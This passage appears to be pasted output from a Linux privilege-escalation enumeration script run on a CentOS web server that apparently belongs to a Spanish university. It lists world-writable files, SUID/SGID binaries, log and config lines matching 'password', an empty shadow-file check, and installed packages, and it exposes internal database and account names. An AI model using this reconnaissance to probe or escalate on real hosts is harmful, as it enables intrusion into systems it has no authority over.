  377. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-hugepages.mount/cgroup.event_control
  378. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-systemd\x2dfsck.slice/cgroup.event_control
  379. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-getty.slice/getty@tty1.service/cgroup.event_control
  380. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-getty.slice/cgroup.event_control
  381. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-selinux\x2dpolicy\x2dmigrate\x2dlocal\x2dchanges.slice/cgroup.event_control
  382. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-mqueue.mount/cgroup.event_control
  383. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/sys-kernel-debug.mount/cgroup.event_control
  384. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/cgroup.event_control
  385. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/cgroup.event_control
  386. -rw-rw-rw- 1 root root 27767 Nov 20 02:04 /var/log/wordpress/wp_incidencias.log
  387. -rw-rw-rw- 1 root root 3786 Oct 22 02:03 /var/log/wordpress/wp_incidencias.log-20171022.gz
  388. -rw-rw-rw- 1 root root 8495 Oct 29 02:03 /var/log/wordpress/wp_incidencias.log-20171029.gz
  389. -rw-rw-rw- 1 root root 8254 Nov 6 02:03 /var/log/wordpress/wp_incidencias.log-20171106.gz
  390. -rw-rw-rw- 1 root root 9055 Nov 12 02:04 /var/log/wordpress/wp_incidencias.log-20171112.gz
  391. -rw-rw-rw- 1 root root 8231 Nov 19 02:04 /var/log/wordpress/wp_incidencias.log-20171119.gz
  392. -rw-rw-rw- 1 programacion programacion 2181659 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/Guadalinfo_Diptico-Hackaton_v2c(2).pdf
  393. -rw-rw-rw- 1 programacion programacion 81069 Sep 26 2014 /home/servertest/public_html/wp-content/uploads/filebase/Jornadas_Acogida.pdf
  394. -rw-rw-rw- 1 programacion programacion 58732 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_CV_EN(2).pdf
  395. -rw-rw-rw- 1 programacion programacion 70412 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767201.pdf
  396. -rw-rw-rw- 1 programacion programacion 72972 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767901.pdf
  397. -rw-rw-rw- 1 programacion programacion 70939 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767304.pdf
  398. -rw-rw-rw- 1 programacion programacion 389213 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767301.pdf
  399. -rw-rw-rw- 1 programacion programacion 70194 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767303.pdf
  400. -rw-rw-rw- 1 programacion programacion 71144 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767209.pdf
  401. -rw-rw-rw- 1 programacion programacion 71849 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767203.pdf
  402. -rw-rw-rw- 1 programacion programacion 70923 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767308.pdf
  403. -rw-rw-rw- 1 programacion programacion 71146 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767207.pdf
  404. -rw-rw-rw- 1 programacion programacion 70580 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767204.pdf
  405. -rw-rw-rw- 1 programacion programacion 70602 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767103.pdf
  406. -rw-rw-rw- 1 programacion programacion 70766 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767202.pdf
  407. -rw-rw-rw- 1 programacion programacion 70653 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767101.pdf
  408. -rw-rw-rw- 1 programacion programacion 70848 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767307.pdf
  409. -rw-rw-rw- 1 programacion programacion 69433 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767306.pdf
  410. -rw-rw-rw- 1 programacion programacion 71413 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767206.pdf
  411. -rw-rw-rw- 1 programacion programacion 71257 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767102.pdf
  412. -rw-rw-rw- 1 programacion programacion 70827 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767208.pdf
  413. -rw-rw-rw- 1 programacion programacion 69950 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767302.pdf
  414. -rw-rw-rw- 1 programacion programacion 71346 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767205.pdf
  415. -rw-rw-rw- 1 programacion programacion 70735 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes/1767305.pdf
  416. -rw-rw-rw- 1 programacion programacion 116774 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/ElPuerto_ESI.pdf
  417. -rw-rw-rw- 1 programacion programacion 1201842 Jul 9 2015 /home/servertest/public_html/wp-content/uploads/filebase/PuertoReal_ESI(2).pdf
  418. -rw-rw-rw- 1 programacion programacion 133401 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/PuertoReal_ESI.pdf
  419. -rw-rw-rw- 1 programacion programacion 76480 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_motivationletter_EN.pdf
  420. -rw-rw-rw- 1 programacion programacion 267246 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/SanFernando_ESI.pdf
  421. -rw-rw-rw- 1 programacion programacion 1107723 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/dossierterritoriohackathoncadiz.pdf
  422. -rw-rw-rw- 1 programacion programacion 257265 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Chiclana_ESI.pdf
  423. -rw-rw-rw- 1 programacion programacion 150447 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/AcTNet-Internship-summersemester15_2(2).pdf
  424. -rw-rw-rw- 1 programacion programacion 114345 Oct 20 2014 /home/servertest/public_html/wp-content/uploads/filebase/Cartel LEAN 2014 (UCA-ESI).pdf
  425. -rw-rw-rw- 1 programacion programacion 150466 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Cadiz_ESI.pdf
  426. -rw-rw-rw- 1 programacion programacion 150447 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/AcTNet-Internship-summersemester15_2.pdf
  427. -rw-rw-rw- 1 programacion programacion 287022 Sep 23 2014 /home/servertest/public_html/wp-content/uploads/filebase/Jerez_ESI.pdf
  428. -rw-rw-rw- 1 programacion programacion 76480 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_motivationletter_EN(2).pdf
  429. -rw-rw-rw- 1 programacion programacion 2181659 May 19 2015 /home/servertest/public_html/wp-content/uploads/filebase/Guadalinfo_Diptico-Hackaton_v2c.pdf
  430. -rw-rw-rw- 1 programacion programacion 58732 Oct 1 2014 /home/servertest/public_html/wp-content/uploads/filebase/Guideline_CV_EN.pdf
  431. -rw-rw-rw- 1 programacion programacion 34242 Sep 30 2014 /home/servertest/public_html/wp-content/uploads/filebase/706582079_2092012184719.pdf
  432. -rw-rw-rw- 1 programacion programacion 1574 Sep 29 2015 /home/servertest/public_html/wp-content/uploads/filebase/noticias_rss
  433.  
  434. [+] Checking if root's home folder is accessible
  435.  
  436. [+] SUID/SGID Files and Directories
  437. drwxrwsr-x 2 root mailman 60 Apr 1 2017 /run/mailman
  438. drwxr-sr-x 3 root systemd-journal 60 Apr 1 2017 /run/log/journal
  439. drwxr-s---+ 2 root systemd-journal 240 Nov 20 16:10 /run/log/journal/fbaa8e75089f4810a59659296fb78a09
  440. drwxrwsr-x 2 root mailman 80 Nov 20 22:20 /run/lock/mailman
  441. -rwsr-s---. 1 root root 439 Mar 5 2015 /etc/yum.repos.d/virtualmin.repo
  442. drwxrwsr-x. 3 root mailman 57 Jul 9 2015 /etc/mailman
  443. drws--S--- 2 mysql epsalgeciras 19 Jul 9 2015 /var/lib/mysql/epsalgeciras
  444. drws--S--- 2 mysql epsalgeciras 12288 Sep 15 13:11 /var/lib/mysql/epsalgeciras_wordpress
  445. drws--S--- 2 mysql imeymat 8192 Sep 12 10:52 /var/lib/mysql/imeymat
  446. drws--S--- 2 mysql master 19 Mar 28 2016 /var/lib/mysql/master
  447. drws--S--- 2 mysql master 4096 Nov 20 21:20 /var/lib/mysql/master_wordpress
  448. drws--S--- 2 mysql gradosindustriales 4096 Dec 16 2016 /var/lib/mysql/gradosindustriales
  449. drws--S--- 2 mysql ccsociales 19 Jun 7 2016 /var/lib/mysql/ccsociales
  450. drws--S--- 2 mysql ccsociales 4096 Sep 22 02:01 /var/lib/mysql/ccsociales_wordpress
  451. drws--S--- 2 mysql ciencias 8192 Sep 22 02:01 /var/lib/mysql/ciencias
  452. drws--S--- 2 mysql default 49 Aug 2 2016 /var/lib/mysql/default
  453. drws--S--- 2 mysql iuila 19 Feb 15 2017 /var/lib/mysql/iuila
  454. drws--S--- 2 mysql iuila 4096 Sep 22 02:00 /var/lib/mysql/iuila_wordpress
  455. drws--S--- 2 mysql enfyfis 4096 Sep 22 02:02 /var/lib/mysql/enfyfis
  456. drws--S--- 2 mysql indess 19 May 9 2017 /var/lib/mysql/indess
  457. drws--S--- 2 mysql indess 4096 Nov 17 08:20 /var/lib/mysql/indess_wordpress
  458. drws--S--- 2 mysql caiv 4096 Sep 22 02:02 /var/lib/mysql/caiv
  459. drws--S--- 2 mysql epsalgeciras1 19 Jun 19 13:02 /var/lib/mysql/epsalgeciras1
  460. drws--S--- 2 mysql epsalgeciras1 16384 Oct 4 11:32 /var/lib/mysql/epsalgeciras1_wordpress
  461. drws--S--- 2 mysql economicas 4096 Sep 22 02:00 /var/lib/mysql/economicas
  462. drws--S--- 2 mysql programacion 12288 Oct 27 08:40 /var/lib/mysql/programacion
  463. drws--S--- 2 mysql masingind 19 Oct 25 10:49 /var/lib/mysql/masingind
  464. drws--S--- 2 mysql masingind 4096 Oct 25 10:52 /var/lib/mysql/masingind_wordpress
  465. drwxrwsr-x. 6 root mailman 55 Jun 24 2015 /var/lib/mailman
  466. drwxrwsr-x. 4 root mailman 33 Jun 24 2015 /var/lib/mailman/archives
  467. drwxrws---. 4 apache mailman 39 Jun 24 2015 /var/lib/mailman/archives/private
  468. drwxrwsr-x. 2 root mailman 20 Jun 24 2015 /var/lib/mailman/archives/public
  469. drwxrwsr-x. 2 root mailman 25 Jul 9 2015 /var/lib/mailman/data
  470. drwxrwsr-x. 3 root mailman 20 Jun 24 2015 /var/lib/mailman/lists
  471. drwxrwsr-x. 2 root mailman 45 Nov 20 12:00 /var/lib/mailman/lists/mailman
  472. drwxrwsr-x. 2 root mailman 6 Jun 24 2015 /var/lib/mailman/spam
  473. drwxrwsr-x. 11 root mailman 4096 Jun 24 2015 /var/spool/mailman
  474. drwxrws---. 2 root mailman 6 Mar 5 2015 /var/spool/mailman/virgin
  475. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/archive
  476. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/shunt
  477. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/out
  478. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/commands
  479. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/retry
  480. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/bounces
  481. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/news
  482. drwxrws---. 2 mailman mailman 6 Mar 5 2015 /var/spool/mailman/in
  483. -r-xr-sr-x. 1 root tty 15344 Jun 10 2014 /usr/bin/wall
  484. -rwsr-xr-x 1 root root 44232 Apr 12 2017 /usr/bin/mount
  485. -rwsr-xr-x 1 root root 64240 Nov 5 2016 /usr/bin/chage
  486. -rwsr-xr-x 1 root root 78216 Nov 5 2016 /usr/bin/gpasswd
  487. -rwsr-xr-x 1 root root 41776 Nov 5 2016 /usr/bin/newgrp
  488. -rws--x--x 1 root root 23960 Apr 12 2017 /usr/bin/chfn
  489. -rwsr-xr-x 1 root root 32096 Apr 12 2017 /usr/bin/su
  490. -rws--x--x 1 root root 23872 Apr 12 2017 /usr/bin/chsh
  491. -rwsr-xr-x 1 root root 31968 Apr 12 2017 /usr/bin/umount
  492. -rwxr-sr-x 1 root tty 19536 Apr 12 2017 /usr/bin/write
  493. ---s--x--x 1 root root 130752 Jun 22 22:02 /usr/bin/sudo
  494. -rwsr-xr-x 1 root root 27680 May 25 21:46 /usr/bin/pkexec
  495. -rwsr-xr-x 1 root root 57552 Mar 31 2016 /usr/bin/crontab
  496. -rwxr-sr-x 1 root mail 19800 Nov 20 2015 /usr/bin/lockfile
  497. ---x--s--x 1 root nobody 306360 Apr 12 2017 /usr/bin/ssh-agent
  498. -rwsr-xr-x. 1 root root 27832 Jun 10 2014 /usr/bin/passwd
  499. -rwsr-sr-x. 1 root root 7144 May 10 2007 /usr/bin/procmail-wrapper
  500. -rwx--s--x 1 root slocate 40512 Nov 5 2016 /usr/bin/locate
  501. -rwsr-xr-x 1 root root 11224 Nov 6 2016 /usr/sbin/pam_timestamp_check
  502. -rwsr-xr-x 1 root root 36280 Nov 6 2016 /usr/sbin/unix_chkpwd
  503. -rwxr-sr-x 1 root root 11224 Apr 12 2017 /usr/sbin/netreport
  504. -rwsr-xr-x 1 root root 11296 Apr 12 2017 /usr/sbin/usernetctl
  505. -rwxr-sr-x. 1 root postdrop 218552 Jun 10 2014 /usr/sbin/postdrop
  506. -rwxr-sr-x. 1 root postdrop 259992 Jun 10 2014 /usr/sbin/postqueue
  507. -rwsr-xr-x 1 root root 15432 May 25 21:46 /usr/lib/polkit-1/polkit-agent-helper-1
  508. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/admin
  509. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/admindb
  510. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/confirm
  511. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/create
  512. -rwxr-sr-x 1 root mailman 11368 Jun 24 2015 /usr/lib/mailman/cgi-bin/edithtml
  513. -rwxr-sr-x 1 root mailman 11368 Jun 24 2015 /usr/lib/mailman/cgi-bin/listinfo
  514. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/options
  515. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/private
  516. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/rmlist
  517. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/roster
  518. -rwxr-sr-x 1 root mailman 11360 Jun 24 2015 /usr/lib/mailman/cgi-bin/subscribe
  519. -rwxr-sr-x 1 root mailman 15592 Jun 24 2015 /usr/lib/mailman/mail/mailman
  520. -r-sr-xr-x 1 root root 9532 Mar 26 2017 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
  521. -r-sr-xr-x 1 root root 14320 Mar 26 2017 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
  522. -rwsr-x--- 1 root dbus 318424 Nov 6 2016 /usr/lib64/dbus-1/dbus-daemon-launch-helper
  523. -rwx--s--x. 1 root utmp 11192 Jun 10 2014 /usr/libexec/utempter/utempter
  524. ---x--s--x 1 root ssh_keys 461496 Apr 12 2017 /usr/libexec/openssh/ssh-keysign
  525. drwxr-sr-x 2 programacion programacion 4096 May 15 2014 /home/servertest/svn
  526.  
  527. [+] Logs containing keyword 'password'
  528. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp.log:CommAmqpListener: [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  529. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp.log:CommAmqpListener: [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  530. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|CApplicationContext|initialize|66|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  531. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|AmqpListenerWorker|run|71|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  532. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|AmqpListenerWorker|run|79|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  533. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-03-26 21:27:45,847|140593386219328|CommAmqpListener|main|127|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  534. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|CApplicationContext|initialize|66|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  535. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|AmqpListenerWorker|run|71|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  536. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|AmqpListenerWorker|run|79|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  537. /var/log/vmware-caf/pme/CommAmqpListener-log4cpp_rolling.log:CRIT|2017-04-01 01:24:13,922|139661680678720|CommAmqpListener|main|127|0x800707DC [CCafException] CAppConfig::getString() Required config parameter [amqp_password] is missing from section [communication_amqp]
  538.  
  539. [+] Config files containing keyword 'password'
  540. /etc/pki/tls/openssl.cnf:# input_password = secret
  541. /etc/pki/tls/openssl.cnf:# output_password = secret
  542. /etc/pki/tls/openssl.cnf:challengePassword = A challenge password
  543. /etc/httpd/conf.d/ssl.conf:# Note that no password is obtained from the user. Every entry in the user
  544. /etc/httpd/conf.d/ssl.conf:# file needs this password: `xxj31ZMTZzkVA'.
  545. /etc/dnsmasq.conf:#dhcp-option=encap:175, 191, pass # iSCSI password
  546. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  547. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  548. /etc/postfix/main.cf~:# NOTE: if you use this feature for accounts not in the UNIX password
  549. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  550. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  551. /etc/postfix/main.cf:# NOTE: if you use this feature for accounts not in the UNIX password
  552. /etc/security/pwquality.conf:# Configuration for systemwide password quality limits
  553. /etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the
  554. /etc/security/pwquality.conf:# old password.
  555. /etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if
  556. /etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0
  557. /etc/security/pwquality.conf:# it is the minimum number of digits in the new password.
  558. /etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password.
  559. /etc/security/pwquality.conf:# password.
  560. /etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password.
  561. /etc/security/pwquality.conf:# password.
  562. /etc/security/pwquality.conf:# The maximum credit for having other characters in the new password.
  563. /etc/security/pwquality.conf:# password.
  564. /etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others).
  565. /etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password.
  566. /etc/security/pwquality.conf:# new password.
  567. /etc/pear.conf:a:30:{s:9:"cache_dir";s:19:"/var/cache/php-pear";s:15:"default_channel";s:12:"pear.php.net";s:16:"preferred_mirror";s:12:"pear.php.net";s:13:"remote_config";s:0:"";s:13:"auto_discover";i:0;s:13:"master_server";s:12:"pear.php.net";s:7:"php_dir";s:15:"/usr/share/pear";s:12:"metadata_dir";s:13:"/var/lib/pear";s:7:"doc_dir";s:19:"/usr/share/doc/pear";s:7:"bin_dir";s:8:"/usr/bin";s:8:"data_dir";s:20:"/usr/share/pear-data";s:7:"cfg_dir";s:9:"/etc/pear";s:7:"www_dir";s:13:"/var/www/html";s:8:"test_dir";s:21:"/usr/share/tests/pear";s:8:"temp_dir";s:8:"/var/tmp";s:12:"download_dir";s:18:"/tmp/pear/download";s:7:"php_bin";s:12:"/usr/bin/php";s:10:"php_prefix";s:0:"";s:10:"php_suffix";s:0:"";s:7:"php_ini";s:0:"";s:8:"username";s:0:"";s:8:"password";s:0:"";s:7:"verbose";i:1;s:15:"preferred_state";s:6:"stable";s:5:"umask";i:18;s:9:"cache_ttl";i:3600;s:8:"sig_type";s:3:"gpg";s:7:"sig_bin";s:12:"/usr/bin/gpg";s:9:"sig_keyid";s:0:"";s:10:"sig_keydir";s:13:"/etc/pearkeys";}
  568. /etc/dovecot/conf.d/10-auth.conf:# We also try to handle password changes automatically: If user's previous
  569. /etc/dovecot/conf.d/10-auth.conf:# TTL for negative hits (user not found, password mismatch).
  570. /etc/dovecot/conf.d/10-auth.conf:# Password database is used to verify user's password (and nothing more).
  571. /etc/dovecot/conf.d/10-auth.conf:#!include auth-checkpassword.conf.ext
  572. /etc/dovecot/conf.d/10-logging.conf:# In case of password mismatches, log the attempted password. Valid values are
  573. /etc/dovecot/conf.d/10-logging.conf:# no, plain and sha1. sha1 can be useful for detecting brute force password
  574. /etc/dovecot/conf.d/10-logging.conf:# attempts vs. user simply trying the same password over and over again.
  575. /etc/dovecot/conf.d/10-logging.conf:#auth_verbose_passwords = no
  576. /etc/dovecot/conf.d/10-logging.conf:# In case of password mismatches, log the passwords and used scheme so the
  577. /etc/dovecot/conf.d/10-logging.conf:#auth_debug_passwords = no
  578. /etc/dovecot/conf.d/10-ssl.conf:# If key file is password protected, give the password here. Alternatively
  579. /etc/dovecot/conf.d/10-ssl.conf:# root owned 0600 file by using ssl_key_password = <path.
  580. /etc/dovecot/conf.d/10-ssl.conf:#ssl_key_password =
  581. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# Authentication for checkpassword users. Included from 10-auth.conf.
  582. /etc/dovecot/conf.d/auth-checkpassword.conf.ext: driver = checkpassword
  583. /etc/dovecot/conf.d/auth-checkpassword.conf.ext: args = /usr/bin/checkpassword
  584. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# Standard checkpassword doesn't support direct userdb lookups.
  585. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# If you need checkpassword userdb, the checkpassword must support
  586. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# driver = checkpassword
  587. /etc/dovecot/conf.d/auth-checkpassword.conf.ext:# args = /usr/bin/checkpassword
  588. /etc/dovecot/conf.d/auth-static.conf.ext:# username or the password, or if there is a single password for all users:
  589. /etc/dovecot/conf.d/auth-static.conf.ext:# - proxy frontend, where the backend verifies the password
  590. /etc/dovecot/conf.d/auth-static.conf.ext:# - proxy backend, where the frontend already verified the password
  591. /etc/dovecot/conf.d/auth-static.conf.ext:# args = proxy=y host=%1Mu.example.com nopassword=y
  592. /etc/dovecot/conf.d/auth-static.conf.ext:# args = password=test
  593. /etc/dovecot/conf.d/auth-system.conf.ext:# Shadow passwords for system users (NSS, /etc/shadow or similiar).
  594. /etc/mailman/sitelist.cfg:# subscribed with. user_password - The user's password. user_name - The
  595. /etc/mailman/sitelist.cfg:# password authentication.
  596. /etc/zabbix/zabbix_agentd.conf:### Change -u<username> and add -p<password> if required
  597.  
  598. [+] Shadow File (Privileged)
  599.  
  600. [*] ENUMERATING PROCESSES AND APPLICATIONS...
  601.  
  602. [+] Installed Packages
  603. GConf2-3.2.6-8.el7.x86_64
  604. GeoIP-1.5.0-11.el7.x86_64
  605. ImageMagick-6.7.8.9-15.el7_2.x86_64
  606. ModemManager-glib-1.6.0-2.el7.x86_64
  607. NetworkManager-1.4.0-20.el7_3.x86_64
  608. NetworkManager-glib-1.4.0-20.el7_3.x86_64
  609. NetworkManager-libnm-1.4.0-20.el7_3.x86_64
  610. NetworkManager-tui-1.4.0-20.el7_3.x86_64
  611. OpenEXR-libs-1.7.1-7.el7.x86_64
  612. acl-2.2.51-12.el7.x86_64
  613. adwaita-cursor-theme-3.14.1-1.el7.noarch
  614. adwaita-icon-theme-3.14.1-1.el7.noarch
  615. aic94xx-firmware-30-6.el7.noarch
  616. alsa-firmware-1.0.28-2.el7.noarch
  617. alsa-lib-1.1.1-1.el7.x86_64
  618. alsa-tools-firmware-1.1.0-1.el7.x86_64
  619. apr-1.4.8-3.el7.x86_64
  620. apr-util-1.5.2-6.el7.x86_64
  621. at-spi2-atk-2.14.1-1.el7.x86_64
  622. at-spi2-core-2.14.1-2.el7.x86_64
  623. atk-2.14.0-1.el7.x86_64
  624. audit-2.6.5-3.el7_3.1.x86_64
  625. audit-libs-2.6.5-3.el7_3.1.x86_64
  626. authconfig-6.2.8-14.el7.x86_64
  627. avahi-0.6.31-17.el7.x86_64
  628. avahi-autoipd-0.6.31-17.el7.x86_64
  629. avahi-libs-0.6.31-17.el7.x86_64
  630. awstats-7.6-3.1.el7.noarch
  631. basesystem-10.0-7.el7.centos.noarch
  632. bash-4.2.46-21.el7_3.x86_64
  633. bind-9.9.4-50.el7_3.1.x86_64
  634. bind-libs-9.9.4-50.el7_3.1.x86_64
  635. bind-libs-lite-9.9.4-50.el7_3.1.x86_64
  636. bind-license-9.9.4-50.el7_3.1.noarch
  637. bind-utils-9.9.4-50.el7_3.1.x86_64
  638. binutils-2.25.1-22.base.el7.x86_64
  639. biosdevname-0.7.2-1.el7.x86_64
  640. btrfs-progs-4.4.1-1.el7.x86_64
  641. bzip2-1.0.6-13.el7.x86_64
  642. bzip2-libs-1.0.6-13.el7.x86_64
  643. ca-certificates-2017.2.14-70.1.el7_3.noarch
  644. cairo-1.14.2-1.el7.x86_64
  645. cairo-gobject-1.14.2-1.el7.x86_64
  646. centos-logos-70.0.6-3.el7.centos.noarch
  647. centos-release-7-3.1611.el7.centos.x86_64
  648. chkconfig-1.7.2-1.el7_3.1.x86_64
  649. clamav-0.99.2-3.el7.centos.vm.x86_64
  650. clamav-data-0.99.2-3.el7.centos.vm.noarch
  651. clamav-filesystem-0.99.2-3.el7.centos.vm.noarch
  652. clamav-lib-0.99.2-3.el7.centos.vm.x86_64
  653. clamav-scanner-0.99.2-3.el7.centos.vm.noarch
  654. clamav-scanner-systemd-0.99.2-3.el7.centos.vm.noarch
  655. clamav-server-0.99.2-3.el7.centos.vm.x86_64
  656. clamav-server-systemd-0.99.2-3.el7.centos.vm.noarch
  657. clamav-update-0.99.2-3.el7.centos.vm.x86_64
  658. clucene-core-2.3.3.4-11.el7.x86_64
  659. colord-libs-1.2.7-2.el7.x86_64
  660. coreutils-8.22-18.el7.x86_64
  661. cpio-2.11-24.el7.x86_64
  662. cracklib-2.9.0-11.el7.x86_64
  663. cracklib-dicts-2.9.0-11.el7.x86_64
  664. cronie-1.4.11-14.el7_2.1.x86_64
  665. cronie-anacron-1.4.11-14.el7_2.1.x86_64
  666. crontabs-1.11-6.20121102git.el7.noarch
  667. cryptsetup-libs-1.7.2-1.el7.x86_64
  668. cups-libs-1.6.3-26.el7.x86_64
  669. curl-7.29.0-35.el7.centos.x86_64
  670. cyrus-sasl-2.1.26-20.el7_2.x86_64
  671. cyrus-sasl-gssapi-2.1.26-20.el7_2.x86_64
  672. cyrus-sasl-lib-2.1.26-20.el7_2.x86_64
  673. cyrus-sasl-md5-2.1.26-20.el7_2.x86_64
  674. cyrus-sasl-plain-2.1.26-20.el7_2.x86_64
  675. dbus-1.6.12-17.el7.x86_64
  676. dbus-glib-0.100-7.el7.x86_64
  677. dbus-libs-1.6.12-17.el7.x86_64
  678. dbus-python-1.1.1-9.el7.x86_64
  679. dejavu-fonts-common-2.33-6.el7.noarch
  680. dejavu-sans-mono-fonts-2.33-6.el7.noarch
  681. desktop-file-utils-0.22-1.el7.x86_64
  682. device-mapper-1.02.135-1.el7_3.5.x86_64
  683. device-mapper-event-1.02.135-1.el7_3.5.x86_64
  684. device-mapper-event-libs-1.02.135-1.el7_3.5.x86_64
  685. device-mapper-libs-1.02.135-1.el7_3.5.x86_64
  686. device-mapper-persistent-data-0.6.3-1.el7.x86_64
  687. dhclient-4.2.5-47.el7.centos.x86_64
  688. dhcp-common-4.2.5-47.el7.centos.x86_64
  689. dhcp-libs-4.2.5-47.el7.centos.x86_64
  690. diffutils-3.3-4.el7.x86_64
